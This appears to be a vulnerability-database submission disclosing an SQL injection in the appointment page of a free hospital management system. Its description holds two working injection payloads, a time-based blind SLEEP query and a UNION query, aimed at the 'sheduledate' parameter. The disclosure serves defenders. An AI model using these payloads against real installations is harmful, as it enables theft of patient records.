| Title | SQL injection in Free Hospital Management System for Small Practices 1.0 |
|---|
| Description | There is an SQL injection vulnerability in the 'sheduledate' parameter of /patient/appointment.php.
Parameter: sheduledate (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: sheduledate=2023-08-24' AND (SELECT 7187 FROM (SELECT(SLEEP(5)))sIsM) AND 'mPuB'='mPuB
Type: UNION query
Title: Generic UNION query (NULL) - 9 columns
Payload: sheduledate=2023-08-24' UNION ALL SELECT 43,43,43,43,43,43,43,CONCAT(0x7170717a71,0x716e716574505a584f787954516777664772734e566b676d717a45666e65774d5a554250687a6748,0x71626b7871),43-- - |
|---|
| Source | ⚠️ https://github.com/CookedMelon/cve/tree/master/hospital/patient |
|---|
| User | CookedMelon (UID 52513) |
|---|
| Submission | 08/11/2023 03:56 (3 years ago) |
|---|
| Moderation | 08/20/2023 09:01 (9 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 237561 [SourceCodester Free Hospital Management System for Small Practices appointment.php sql injection] |
|---|
| Points | 20 |
|---|